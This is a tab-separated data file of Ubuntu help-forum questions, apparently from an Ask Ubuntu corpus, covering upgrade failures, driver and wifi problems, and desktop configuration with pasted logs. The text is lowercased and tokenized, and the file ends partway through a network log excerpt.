286999	how to prevent nautilus from opening new instances when it opens a mounted partition	in ubuntu whenever i open a mounted partition in nautilus and switch to other applications , clicking the icon of nautilus on the launcher bar will open a new instance of nautilus , instead of switching to the previously opened one . this does not happen if the already opened folder is in a linux partition . is there anyway to fix this ?
287000	restore generic video driver	i 've installed video drivers from the official site support of amd/nvidia , ive got an ati sapphire 3850hd . when i reboot the top bar of evert windows is disappear and the left bar of ubuntu its disappear to . how can i restore my old generic driver ?
287002	facebook extension for firefox	when i upgraded to ubuntu 12.10 , upon starting up firefox i was asked if i wanted to install the facebook extension . i clicked yes , and it installed , and it shows up under empathy messenger when i click the envelope in the top bar . now when i try to go to facebook , nothing loads , and i get the error message `` unable to load the webpage because the server sent no data . '' i can not go to facebook on any web browser after installing this package . is there a way i can fix this ? or can i remove this facebook app completely ? if so , how ?
287009	any way i can upgrade straight from 12.10 to 13.04 ?	i am running 12.10 and would like to get to that new 13.04 ringtail , any way i could go about doing this without losing all my programs , images , other data and having to re-sync google chrome again and so on ? in a way that is more like an update process rather than just replacing 12 with 13 ? also i suppose i might ask this while i 'm at it , is it even worth it right now to get 13.04 anyway ? is it really stable and cool ? in general i 'm pretty new to ubuntu but i was just wondering more or less . thanks for any help here .
287015	system-v-like utilities wo n't install	the following pacages wo n't update in my ubuntu 12.04 , i just upgraded it to 12.10 and all the updates installed , but these wo n't : system-v-like utilities the elementary widget set library runtime datafiles for libelementary the error log i get is : installarchives ( ) failed : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = ( unset ) , lc_all = ( unset ) , lang = `` en_in.iso8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory selecting previously unselected package sysvutils . ( reading database ... ( reading database ... 5 % % ( reading database ... 10 % % ( reading database ... 15 % % ( reading database ... 20 % % ( reading database ... 25 % % ( reading database ... 30 % % ( reading database ... 35 % % ( reading database ... 40 % % ( reading database ... 45 % % ( reading database ... 50 % % ( reading database ... 55 % % ( reading database ... 60 % % ( reading database ... 65 % % ( reading database ... 70 % % ( reading database ... 75 % % ( reading database ... 80 % % ( reading database ... 85 % % ( reading database ... 90 % % ( reading database ... 95 % % ( reading database ... 100 % % ( reading database ... 245770 files and directories currently installed . ) unpacking sysvutils ( from ... /sysvutils_2.86.ds1-14.1ubuntu45.1_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/sysvutils_2.86.ds1-14.1ubuntu45.1_i386.deb ( -- unpack ) : trying to overwrite '/usr/share/man/man1/mesg.1.gz ' , which is also in package sysvinit-utils 2.88dsf-13.10ubuntu13 no apport report written because maxreports is reached already processing triggers for man-db ... locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory errors were encountered while processing : /var/cache/apt/archives/sysvutils_2.86.ds1-14.1ubuntu45.1_i386.deb error in function :
287016	how do i configure the launcher to “dodge windows” ?	how do i configure the launcher to “dodge windows” in 13.04 ? by unity revamped / like , please not batch files . i want to go into ccsm and enable it like in 11.10 or 12.04 with unity revamped . i do n't want a batch file , because the batch file based implementations of the unity `` dodge windows '' are buggy . to clarify , dodge windows is where the launcher slides away when a window overlaps it
287018	lost steam games stored in ntfs partition upon upgrading to 13.04 ; ca n't re-add steam library folder	i used a live dvd to upgrade to 13.04 . however , this reset my fstab file , which i had previously set up to auto-mount using pysdm . because of this , when i reinstalled steam , it was unable to detect the games i had previously installed to my windows partition . attempting to re-add this folder to my steam library folders left me with an error message stating new steam library folder must be on a filesystem with executable permissions . i then edited my fstab file to add the appropriate partition with the options uid=1000 , gid=1000 , dmask=027 , fmask=137 , but i still get this error . how do i re-add my old steam library folder ?
287021	how to fix `` read-only file system '' error when i run something as sudo and try to make a folder/file ?	when i try to save something or rename a file/folder it say this error `` read-only file system '' or run something as root in the terminal it say this error sudo : unable to open /var/lib/sudo/ '' my user name '' /0 : read-only file system w : not using locking for read only lock file /var/lib/dpkg/lock e : unable to write to /var/cache/apt/ e : the package lists or status file could not be parsed or opened . when i make a folder the error dialog in the details with nautilus is this : error creating directory : read-only file system i would show you i picture of it but it is n't even letting my save onto my flash drive . please help me .
287023	https : //wiki.ubuntu.com 's fonts are too small , how do i report the problem ?	https : //wiki.ubuntu.com page is beautiful . but it is too wide , this makes fonts too small . if i enlarge page i must pull to right . it is so boring . the font looks small especially in notebook . this will do harm to my neck . can administrator revise the site style ? i do not know if the question should be posted here . thanks
287027	how do i install indicator-workspace ?	i receive this error when i install the software . basically i want to know which space am i working on . $ sudo apt-get install indicator-workspaces reading package lists ... done building dependency tree reading state information ... done package indicator-workspaces is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source e : package 'indicator-workspaces ' has no installation candidate
287036	start ubuntu13.04 and then it turns to black screen	i do need help . i just updated 12.10 to 13.04 but the problem occured . every time i start my laptop it turns to a black screen . after the grub and the purple screen . and i also hear the voice from the password interface . this means the system has started sucessfully but the screen is black . i can see nothing . and if i go into recovery mode and then choose resume option , the black screen goes . why ? i have googled a lot and tried a lot but none works . by the way , the graphic ui is a little bit slower than 12.10 . my laptop is acer aspire s3 , with a intel gma hd 4000 graphics . hope somebody could help me .
287039	tp-link tl-wn725n can not work in kernel 3.2.0-40-generic under 12.04	tp-link tl-wn725n can work out of box in kernel 3.2.0-34-generic under 12.04 amd64 . after i update to kernel 3.2.0-40-generic , it does not work out of box in kernel 3.2.0-40-generic under 12.04 amd64 . i use ubuntu 12.04 amd64 . tp-link tl-wn725n chip is rtl8188cus . is here anyone who meet the same problem ? thanks
287041	unable to boot windows 8 after installing ubuntu in pendrive	i installed ubuntu on my 32gb pen-drive which is a clean installation.after installation i unplugged my pen-drive now i can not boot in to windows . it says grub rescue . what do i do . ?
287047	ubuntu upgrade from 12.10 to 13.04 failed ( interrupted ) - can not access ubuntu	ubuntu upgrade from 12.10 to 13.04 - > failed ( interrupted ) and now i want to get my data back . is there any way , without uninstalling the wubi ? how it happened : 13.04 decides to download around 1 gb of files ( 1500+ files ) . it warned me that it 'll take around 1 hour for upgrade and my laptop was at 80 % ( 2 hrs battery ) i decided to take a nap , and forgot to put the laptop on the ac power i woke up in the morning to find out the battery had died and the laptop was off . when i reboot , thankfully it showed me both option of the dual boot . ( win 7 and ubuntu ) on selecting ubuntu , it showed error : no wubildr for a split second and then the ubuntu purple screen . i wait for 5-7 mins to see there is no activity ( hard disk light is not even blinking ) , just the blank purple screen and then i manually switched off the laptop and restarted in ubuntu and again the same issue . i want to get my data now , since it 's not accessible from win 7 . is there any way to get it back , also if the wubildr is corrupted , then can i just re-install it without affecting the installed files ?
287049	12.04lts log in fails	i have been using ubuntu for years , but i am ict challenged . 12.04lts recently crashed while i was on the interweb . now , when i try to boot , it asks me to log in . never had to do this before , and the 3 possible passwords that i use for everything do n't work . i can log in as a guest , but of course i ca n't access my folders or documents . any thoughts ?
287051	ca n't connect to wifi after update to 13.04	*lspci -nn* 00:00.0 host bridge [ 0600 ] : intel corporation core processor dram controller [ 8086:0044 ] ( rev 18 ) 00:02.0 vga compatible controller [ 0300 ] : intel corporation core processor integrated graphics controller [ 8086:0046 ] ( rev 18 ) 00:16.0 communication controller [ 0780 ] : intel corporation 5 series/3400 series chipset heci controller [ 8086:3b64 ] ( rev 06 ) 00:1a.0 usb controller [ 0c03 ] : intel corporation 5 series/3400 series chipset usb2 enhanced host controller [ 8086:3b3c ] ( rev 05 ) 00:1b.0 audio device [ 0403 ] : intel corporation 5 series/3400 series chipset high definition audio [ 8086:3b56 ] ( rev 05 ) 00:1c.0 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 1 [ 8086:3b42 ] ( rev 05 ) 00:1c.5 pci bridge [ 0604 ] : intel corporation 5 series/3400 series chipset pci express root port 6 [ 8086:3b4c ] ( rev 05 ) 00:1d.0 usb controller [ 0c03 ] : intel corporation 5 series/3400 series chipset usb2 enhanced host controller [ 8086:3b34 ] ( rev 05 ) 00:1e.0 pci bridge [ 0604 ] : intel corporation 82801 mobile pci bridge [ 8086:2448 ] ( rev a5 ) 00:1f.0 isa bridge [ 0601 ] : intel corporation mobile 5 series chipset lpc interface controller [ 8086:3b09 ] ( rev 05 ) 00:1f.2 sata controller [ 0106 ] : intel corporation 5 series/3400 series chipset 4 port sata ahci controller [ 8086:3b29 ] ( rev 05 ) 00:1f.3 smbus [ 0c05 ] : intel corporation 5 series/3400 series chipset smbus controller [ 8086:3b30 ] ( rev 05 ) 00:1f.6 signal processing controller [ 1180 ] : intel corporation 5 series/3400 series chipset thermal subsystem [ 8086:3b32 ] ( rev 05 ) 01:00.0 ethernet controller [ 0200 ] : qualcomm atheros ar8151 v1.0 gigabit ethernet [ 1969:1073 ] ( rev c0 ) 02:00.0 network controller [ 0280 ] : atheros communications inc. ar9287 wireless network adapter ( pci-express ) [ 168c:002e ] ( rev 01 ) 7f:00.0 host bridge [ 0600 ] : intel corporation core processor quickpath architecture generic non-core registers [ 8086:2c62 ] ( rev 05 ) 7f:00.1 host bridge [ 0600 ] : intel corporation core processor quickpath architecture system address decoder [ 8086:2d01 ] ( rev 05 ) 7f:02.0 host bridge [ 0600 ] : intel corporation core processor qpi link 0 [ 8086:2d10 ] ( rev 05 ) 7f:02.1 host bridge [ 0600 ] : intel corporation core processor qpi physical 0 [ 8086:2d11 ] ( rev 05 ) 7f:02.2 host bridge [ 0600 ] : intel corporation core processor reserved [ 8086:2d12 ] ( rev 05 ) 7f:02.3 host bridge [ 0600 ] : intel corporation core processor reserved [ 8086:2d13 ] ( rev 05 ) *`ip link`* 1 : lo : < loopback , up , lower_up > mtu 65536 qdisc noqueue state unknown mode default link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2 : eth0 : < broadcast , multicast , up , lower_up > mtu 1500 qdisc pfifo_fast state up mode default qlen 1000 link/ether 60 : eb:69:8c:88 : e4 brd ff : ff : ff : ff : ff : ff 3 : wlan0 : < no-carrier , broadcast , multicast , up > mtu 1500 qdisc mq state down mode dormant qlen 1000 link/ether 18 : f4:6a:3a:6e : f6 brd ff : ff : ff : ff : ff : ff
287055	need help to do data recovery on my external hard disk	i was unable to access my wd nas drive after almost 3yrs of usage . with all the googling , i reckon the ultimate solution is to remove the casing and these are what i have done so far : attach the drive to my laptop using a sata cable . downloaded ubuntu on my sandisk usb thumbdrive and boot up from usb tried to access my files on my hard disk drive but do n't know how to ( read that it was supposedly quite simple but ... ) . unfortunately , i 'm stuck and not sure how to proceed . i have taken a screenshot after trying a long time to even locate my hard disk drive ( pls pardon me ! feel like an idiot ... ) but could n't upload that picture ( error : failed to upload image ; could n't reach imgur ) . but in short , i managed to locate my hard disk ( device : /dev/sdc1 ) and it shows 4 partitions . under assessment , it says smart is not supported . does it refer to a different file format or that my hard disk is corrupted ( i really hope it is n't ! ) ? can some kind soul help me out and guide me please ? thank you so much in advance ! ps : i 'd love to upload the screen shot if possible . so if someone can guide me , it 'll be great !
287056	how to compile & install emerald window manager in ubuntu 13.04 64bit ?	please give me directions to compile & install emerald specifically in raring ringtail 64bit edition . i 've tried to compile it from the source many times , but had no luck . ( compile log : http : //paste.ubuntu.com/5612178/ ) thanks in advance !
287060	13.04 unity troubles related to nvidia optimus	i know this bug in variations has been discussed in other questions , but none of the solutions work ... i 'm running ubuntu on a lenovo thinkpad t420s . it has a nvidia optimus discrete graphics card . i need the nvidia drivers in order to program in cuda , and everything worked in ubuntu 12.04 . after upgrading to 12.10 , launcher disappeared . tried to fix by activating unity plugin through ccsm and various other solutions , nothing worked . in the end , i just used the gnome environment . once again , everything worked . not having yet learned my lesson , i eagerly upgraded to 13.04 because i missed unity and was hoping it would magically work . and guess what ? it did ! unity was working fine ... then i tried running a cuda 'helloworld ' type program , and it seg faulted . this was strange , as the program itself was fine and had never segfaulted before . i surmised something was wrong with the graphics card drivers , so i tried : removing bumblebee ( i know this was kind of random but i wanted to give it a fresh start ) reinstalling nvidia-common and voila ! cuda worked . however , on reboot i found that unity had disappeared again ! grrr . once again , reactivating unity plugin from ccsm has no effect , nor do other solutions discussed on this site , e.g . everything here : unity is broken after upgrading to 12.10 ( optimus laptop ) i 've tried disabling optimus in the bios , and purging and reinstalling nvidia drivers ... but i ca n't figure out how to get unity back . and to top it off , they disabled the gnome fallback in 13.04 ! ! so , i 'm really confused right now , since it did work immediately after install 13.04 . i suspect that the answer must lie in some combination of : nvidia driver use optimus use in bios bumblebee integration but i ca n't figure it out . i have some error messages which may help . i reinstalled bumblebee , and when i run optirun : [ error ] can not access secondary gpu - error : [ xorg ] ( ee ) no devices detected . when i , out of curiosity , ran the command 'unity ' : ... ok , that 's odd . it threw errors last time , but this time it did n't . alright , i tried enabling unity again in ccsm and restart lightdm , and lo and behold it worked . unity has returned . however , cuda is still broken , and i 'm kind of afraid to try reinstalling the nvidia-common drivers now . any suggestions ? if there 's some commands i can run to get useful information about my system setup , please comment and i will run them and post the output .
287064	how do i make an ubuntu usb flash drive installer / bootable usb ?	how can i make an ubuntu usb flash drive installer ( or bootable usb ) , containing the the latest version of ubuntu ? for completeness , how would i be able to do this on ubuntu , windows , os x or another linux distro ?
287071	i cant update ubuntu 12.10	apt-get update fails with this message failed to fetch gzip : /var/lib/apt/lists/partial/in.archive.ubuntu.com_ubuntu_dists_quantal_universe_binary-i386_packages hash sum mismatch
287076	ubuntu 13.04 speakers making no sound after booting ?	i get this weird issue when you boot a certain time into 13.04 , the sound does n't work . restarting the computer fixes the sound and nothing seems to be wrong after that . would this be considered a bug ? when that one time the booting causes the no sound problem , you can see a field of codes and text something you would see in the terminal . i 'm assuming that might be kernel or am i wrong ?
287083	amd hybrid graphics , hide intel gpu ? 13.04	clearly no one seems to be able to find an easy way to fix this . im pretty sure the issue is the intel driver conflicting with the catalyst driver , this was fixed for a while in 12.10 by someone downgrading it in a ppa . anyway is there any way to just disable the intel gpu and run pure amd gpu . i know you can blacklist the amd but have had no luck with the intel . or can someone make a fake intel driver that still lets you boot up in amd , just dont switch to intel and it will be fine .
287087	change ubuntu software center download directory to different drive from os drive ?	ok , im relatively new to ubuntu and have a custom built computer . i am utilizing three drives , 1 ssd , and 2 hard drives . i have installed my os to my ssd , and want to use the other two for gaming and various other reasons while mounted for this os . i am having to redirect all important programs to download or install to the other hard drives , i am having issues with ubuntu software center . is it possible to change the download directory to my other drives ?
287094	how do i get the brightness buttons on a dell inspiron n4010 working ?	after 13.04 update the brightness control and even brightness in setting have stopped working . the brightness is on full and does n't decrease . so far sound and wifi is working . any settings or parameters that can be useful ? even on suspend laptop is not going on sleep mode . this was working on 12.10
287096	how to change the screen resolution in vnc viewer for ubuntu 12.04 without a monitor ?	i have ubuntu 12.04 installed on a machine and i always use it remotely from vnc . when i have monitor connected to this machine , i can change the resolution of my vnc viewer in the following line : $ vnc4server -- geometry 1440x900 this worked for me , but i always use this machine remotely , i unplug the monitor and reboot . and the above command line not work anymore . then i tried xrandr sz : pixels physical refresh *0 1024 x 768 ( 260mm x 195mm ) *60 current rotation - normal current reflection - none rotations possible - normal reflections possible - none there is only one option available , so i tried to add a new one . $ cvt 1440 900 # 1440x900 59.89 hz ( cvt 1.30ma ) hsync : 55.93 khz ; pclk : 106.50 mhz modeline `` 1440x900_60.00 '' 106.50 1440 1528 1672 1904 900 903 909 934 -hsync +vsync $ xrandr -- newmode `` 1440x900_60.00 '' 106.50 1440 1528 1672 1904 900 903 909 934 -hsync +vsync $ xrandr -- addmode s2 `` 1440x900_60.00 '' then i checked with xrandr again and ca n't see the new mode added . i try to execute the following command and get error says my randr is too old . $ xrandr -- output s2 -- mode 1440x900_60.00 xrandr : server randr version before 1.2 but this does not make sense to me , if i plug in the monitor back and run the xrandr command , it works again ! it seems that ubuntu must conntect to a real monitor before i can change my resolution in my vnc viewer . can anyone help ? update : finally i solved this problem by changing to tightvncserver $ tightvncserver -geometry 1440x900 works for me . thanks everything answered my question
287097	no internal harddrive , i want to be able to still use the remaining space on 64gbflashdrive	i have no internal hard-drive , i currently am using my brothers flash drive to run ubuntu and i have a 64gb flash drive but would like to still use the flash drives remaining space once ubuntu is installed . is this possible or am i forever doomed to only be able to run ubuntu on it and never use it for anything else at the same time , like an internal ?
287101	gdm3 does n't start after installing ati d	i have just installed some graphics drivers on my debian 6 . i used sgfxi script which generated /etc/x11/xorg.conf file and installed ati drivers . after installation which was succeeded i could n't start gnome again . i saw only blinking cursor on the plain screen . when i rebooted system it looked the same . i used to use debian about two years ago but i had never such problems with x-server .
287102	how would i get ubuntu server to do this ?	so i have a minecraft server and a website ( 72.42.104.172 , for anyone wondering ) , and i want two things to startup when the computer boots : minecraft server and the minecraft overviewer . i want the server to startup in tty1 and the overviewer to startup in tty2 . ( the apache thing starts up fine and runs in the background ) by the way , the overviewer is just a bash script to repeat overviewer -- config ~/overviewer/config every hour . how would i do this ?
287113	primusrun does n't seem to use my nvidia card	i have been installing bumblebee and primus in order to play a few game on my laptop . when i test them with respectively optirun glxspheres primusrun glxspheres , i see an adequate increase of the framerate in optirun but primusrun run gives about the same rate as glxspheres , not better . it seems like primusrun does n't use my nvidia card or uses nouveau ? is there a configuration step for primus i missed ? all i did was editing xorg.conf with the correct busid `` pci:01:00:0 '' , using lspci | grep nvidia ( see http : //ubuntuforums.org/showthread.php ? t=2129405 ) . i am using up-to-date bumblebee , primus , nvidia-current drivers . the card is a nivida gt 620m . i do n't know which information i should add but i 'm here for more details ! thanks for reading !
287114	just upgraded 13.04 and now my c700 notebook make a popping sound	this is my first time here and i am trying to find an answer for this annoying popping sound . i started with ubuntu 12.10 and my notebook did make a few little clicks ( or popping sounds ) which i ignored . now i have accepted the on-screen invite and updated to 13.04 and apart from a few little niggles that this version does things differently no major problems up till now but my notebook makes 3 pooping sounds every so often sometimes every 18 seconds and then it stops for a while . does anyone know if this is a problem with my machine or something within the 13.04 version . i have tried turning off sound effects and even muting the machine but it is still there . strange that as i am typing this it is not popping ? thanks john
287116	gmate installation issue	i was following the link gmate and using gedit as a ruby ide to make my gedit as ide . but when all the command was running good , the below one throwing me an error . kirti @ kirti-aspire-5733z : ~ $ sudo apt-get install gedit-gmate [ sudo ] password for kirti : reading package lists ... done building dependency tree reading state information ... done e : unable to locate package gedit-gmate kirti @ kirti-aspire-5733z : ~ $ help me to fix the issue .
287117	issues upgrading to 13.04 from 12.10 from 12.04	after upgrading , booting into unity ( ubuntu default at the login screen ) i see just the background image and nothing else , no status bar , and the windows/command/super key does not work as expected . youtube and other videos play , but no sound . i can only get the gnome ( and it looks to be gnome 2-ish , definitely not the gnome 3 i 'm used to ) shell to work completely . /var/log/xorg.0.log : http : //pastebin.ca/2368675 /var/log/syslog : http : //pastebin.ca/2368676 david @ poseidon : ~ $ lspci -v | grep -i vga 01:05.0 vga compatible controller : advanced micro devices [ amd ] nee ati rs880 [ radeon hd 4200 ] ( prog-if 00 [ vga controller ] ) any an all help appreciated , and if i 've not provided enough detail please let me know .
287118	upgrading to ubuntu 13.04 with live usb on dual boot system	i have dual boot win7/ubuntu 12.10 . i have a 13.04 live usb . how can i upgrade the 12.10 install from the live usb ? i read previous questions here that answer this question - they all say that the upgrade option comes up when you hit install . in my case , the options that come up are `` install ubuntu alongside other oses '' , fresh install , and `` something else '' . i tried the first and last of those options , and neither of them showed any option for upgrades .
287127	how to hit ctrl + c on a terminal so that child terminals do not be closed ?	this script opens three terminals , but if i hit ctrl + c where i run this script , all three child terminals will close too ! file testchilddetach.sh # ! /bin/bash echo $ $ while true ; do nohup xterm -e `` echo nohup ; bash '' & xterm -e `` echo disown ; bash '' & disown xterm -e `` echo normal ; bash '' & while true ; do ps -a -o pid , ppid , command |grep xterm |grep -v grep echo sleep 5 sleep 5 done done i need to find a way to keep a child terminal open ! i ca n't fork the script like testchilddetach.sh & as it will give back the command line . the real script is much more complex and must not do that . here is ubuntu 12.10 64 bits ( i could n't make it work on ubuntu 12.04 too as i remember ) . see at the output that the parent of these terminals remain the same . i wonder , if the parent terminal/proccess is killed , what happens to the parent of the child processes/terminals ? i would expect them to become `` 1 '' . based on the tip given by @ amrith92 , i managed to improve the script to this : testchilddetach.sh # ! /bin/bash echo $ $ function funcdetach ( ) { nohup xterm -e `` echo nohup_detach ; bash '' & xterm -e `` echo disown_detach ; bash '' & disown xterm -e `` echo normal_detach ; bash '' & } export -f funcdetach while true ; do nohup xterm -e `` echo nohup ; bash '' & xterm -e `` echo disown ; bash '' & disown xterm -e `` echo normal ; bash '' & xterm -e `` echo funcdetach ; funcdetach ; bash ; '' & while true ; do ps -a -o pid , ppid , command |grep xterm |grep -v grep echo sleep 5 sleep 5 done done now , when you hit ctrl + c , 3+1 child terminals will die , but 3 will stay alive ! also , in this case , there seems to be no difference in using nohup , disown or nothing ... in short , xterm -e `` xterm -e \ '' bash\ '' '' allows me to hit ctrl + c and the child terminal stays open ! but ... i feel like i found a flaw that may be fixed in the future ... so i do n't feel confortable coding my scripts this way .
287129	xubuntu xfce switcher icons	is it possible to somehow modify the xfce alt+tab switcher ? what i 'd like : use theme icons ( for some apps it uses some lowres-non-theme ones , for others it works nice ) do n't make tiny previews for gimp , ristretto , etc . i 'm at 13.04 xubuntu . some apps , that have `` ugly '' icons in switcher : terminator , clementine , skype , synaptic some apps , that have the nice theme 's icons : chromium , firefox , thunderbird
287131	files 3.6.3 overwrites existing files when merging two folders	i 've upgraded from ubuntu 12.10 that i installed with wubi , to ubuntu 13.04 . when copying a folder from my secondary hard drive to a folder located in `` /host/ '' with the same name , `` files '' asks me if i want to merge these two folders . after clicking `` merge '' , it overwrites existing files that have the same name instead of asking me if i want to skip replacing them . in 12.10 , nautilus 3.4.2 asked me if i want to skip overwriting existing files . now , in ubuntu 13.04 with files 3.6.3 , it overwrites files without asking me , but only when i merge a folder with one located in `` /host '' . maybe it 's a bug in this new file manager . what can i do ?
287135	ubuntu 13.04 can not connect via wifi but can connect to hotspot created with android	i 've just bought a new computer ( lenovo g580 ) and installed ubuntu 13.04 . i ca n't connect via wi-fi , only via cable . i 've tried with several networks ( mine and my neighbors ) but nothing , and then the weird part comes : when creating a hotspot with my android device i was able to connect to internet . i am a bit confused ! does anybody knows what may be happening or how to solve it ? maybe this data is useful : 02:00.0 ethernet controller [ 0200 ] : qualcomm atheros ar8162 fast ethernet [ 1969:1090 ] ( rev 10 ) 03:00.0 network controller [ 0280 ] : broadcom corporation bcm4313 802.11b/g/n wireless lan controller [ 14e4:4727 ] ( rev 01 ) if you need any further data please ask , i will try to answer asap . pd : before installing ubuntu 13.04 i was using an old computer with ubuntu 12.04 and wifi worked just fine . pd2 : i have tried with several wifi connections , mine and 3 neighbors , but we all have in common the same isp . edit : result of running 'grep networkmanager /var/log/syslog | tail -30 ' while connected to the android hotspot : pakete207 @ pakete207-g580 : ~ $ grep networkmanager /var/log/syslog | tail -30 apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > ( eth1 ) : supplicant interface state : scanning - > associating apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > ( eth1 ) : supplicant interface state : associating - > 4-way handshake apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > ( eth1 ) : supplicant interface state : 4-way handshake - > completed apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth1/wireless ) stage 2 of 5 ( device configure ) successful . connected to wireless network 'pakete207 ' . apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) scheduled . apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) started ... apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > ( eth1 ) : device state change : config - > ip-config ( reason 'none ' ) [ 50 70 0 ] apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth1 ) beginning dhcpv4 transaction ( timeout in 45 seconds ) apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > dhclient started with pid 2676 apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth1 ) beginning ip6 addrconf . apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth1 ) stage 3 of 5 ( ip configure start ) complete . apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > ( eth1 ) : dhcpv4 state changed nbi - > preinit apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > ( eth1 ) : dhcpv4 state changed preinit - > bound apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > address 192.168.43.88 apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > prefix 24 ( 255.255.255.0 ) apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > gateway 192.168.43.1 apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > hostname 'pakete207-g580' apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > nameserver '192.168.43.1' apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth1 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... apr 28 11:20:11 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth1 ) stage 5 of 5 ( ipv4 commit ) started ... apr 28 11:20:12 pakete207-g580 networkmanager [ 995 ] : < info > ( eth1 ) : device state change : ip-config - > secondaries ( reason 'none ' ) [ 70 90 0 ] apr 28 11:20:12 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth1 ) stage 5 of 5 ( ipv4 commit ) complete . apr 28 11:20:12 pakete207-g580 networkmanager [ 995 ] : < info > ( eth1 ) : device state change : secondaries - > activated ( reason 'none ' ) [ 90 100 0 ] apr 28 11:20:12 pakete207-g580 networkmanager [ 995 ] : < info > policy set 'pakete207 ' ( eth1 ) as default for ipv4 routing and dns . apr 28 11:20:12 pakete207-g580 networkmanager [ 995 ] : < info > writing dns information to /sbin/resolvconf apr 28 11:20:12 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth1 ) successful , device activated . apr 28 11:20:32 pakete207-g580 networkmanager [ 995 ] : < info > ( eth1 ) : ip6 addrconf timed out or failed . apr 28 11:20:32 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... apr 28 11:20:32 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv6 configure timeout ) started ... apr 28 11:20:32 pakete207-g580 networkmanager [ 995 ] : < info > activation ( eth1 ) stage 4 of 5 ( ipv6 configure timeout ) complete . pakete207 @ pakete207-g580 : ~ $ result while trying to connect to the domestic network ( not possible to connect ) : pakete207 @ pakete207-g580 : ~ $ grep networkmanager /var/log/syslog | tail -60 apr 28 12:00:01 pakete207-g580 networkmanager [ 996 ] : < info > gateway 192.168.1.1 apr 28 12:00:01 pakete207-g580 networkmanager [ 996 ] : < info > nameserver '192.168.1.1' apr 28 12:00:01 pakete207-g580 networkmanager [ 996 ] : < info > domain name 'localdomain' apr 28 12:00:01 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 configure commit ) scheduled ... apr 28 12:00:01 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) started ... apr 28 12:00:02 pakete207-g580 networkmanager [ 996 ] : < info > ( eth0 ) : device state change : ip-config - > secondaries ( reason 'none ' ) [ 70 90 0 ] apr 28 12:00:02 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth0 ) stage 5 of 5 ( ipv4 commit ) complete . apr 28 12:00:02 pakete207-g580 networkmanager [ 996 ] : < info > ( eth0 ) : device state change : secondaries - > activated ( reason 'none ' ) [ 90 100 0 ] apr 28 12:00:02 pakete207-g580 networkmanager [ 996 ] : < info > policy set 'conexión cableada 1 ' ( eth0 ) as default for ipv4 routing and dns . apr 28 12:00:02 pakete207-g580 networkmanager [ 996 ] : < info > writing dns information to /sbin/resolvconf apr 28 12:00:02 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth0 ) successful , device activated . apr 28 12:00:21 pakete207-g580 networkmanager [ 996 ] : < info > ( eth0 ) : ip6 addrconf timed out or failed . apr 28 12:00:21 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) scheduled ... apr 28 12:00:21 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) started ... apr 28 12:00:21 pakete207-g580 networkmanager [ 996 ] : < info > activation ( eth0 ) stage 4 of 5 ( ipv6 configure timeout ) complete . 